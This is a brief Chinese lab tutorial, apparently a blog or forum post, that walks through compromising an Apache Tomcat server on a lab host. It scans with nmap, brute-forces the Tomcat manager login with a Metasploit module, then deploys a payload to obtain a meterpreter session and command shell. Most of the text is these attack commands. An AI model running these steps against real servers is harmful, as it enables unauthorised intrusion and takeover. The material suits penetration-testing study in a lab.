实验环境
ip 10.1.1.4 端口 8080已打开(tomcat默认开启端口)
1、打开metasploit console控制台
2、对网段开放了8080端口的主机进行扫描
nmap -sV 10.1.1.0/24 -p 8080
3、搜索msf关于tomcat可用模块
search tomcat
4、使用模块
use auxiliary/scanner/http/tomcat_mgr_login
查看配置
show options
设置
set rhosts 10.1.1.4
执行
run
可以获得tomcat的用户名密码
继续使用来getshell
use exploit/multi/http/tomcat_mgr_deploy
show options
set username xxx
set password xxx
set rhost 10.1.1.4
set rport 8080
run
成功后,返回meterpreter
shell获取服务器cmdshell
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用
。你还可以使用@
来通知其他用户。